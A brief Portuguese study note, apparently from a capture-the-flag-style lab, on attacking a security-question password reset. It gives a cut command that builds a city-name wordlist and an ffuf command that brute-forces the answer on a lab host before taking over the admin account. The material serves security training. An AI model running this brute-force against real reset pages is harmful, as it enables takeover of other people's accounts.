Vulnerable Password Reset

• Por exemplo, supondo que um aplicativo da web use uma pergunta de segurança como What city were you born in?:

• Usar um arquivo CSV como este que contém uma lista de mais de 25.000 cidades com mais de 15.000 habitantes de todo o mundo.

• Como o arquivo CSV contém o nome da cidade no primeiro campo, podemos criar nossa lista de palavras contendo apenas o nome da cidade em cada linha usando o seguinte comando:

cat world-cities.csv | cut -d ',' -f1 > city_wordlist.txt

• Em seguir especificar que queremos atingir, como por exemplo, admin

• Usar o ffuf

ffuf -w ./city_wordlist.txt -u http://pwreset.htb/security_question.php -X POST -H "Content-Type: application/x-www-form-urlencoded" -b "PHPSESSID=39b54j201u3rhu4tab1pvdb4pv" -d "security_response=FUZZ" -fr "Incorrect response."

• Após obter a resposta de segurança, podemos redefinir a senha do usuário administrador e assumir totalmente o controle da conta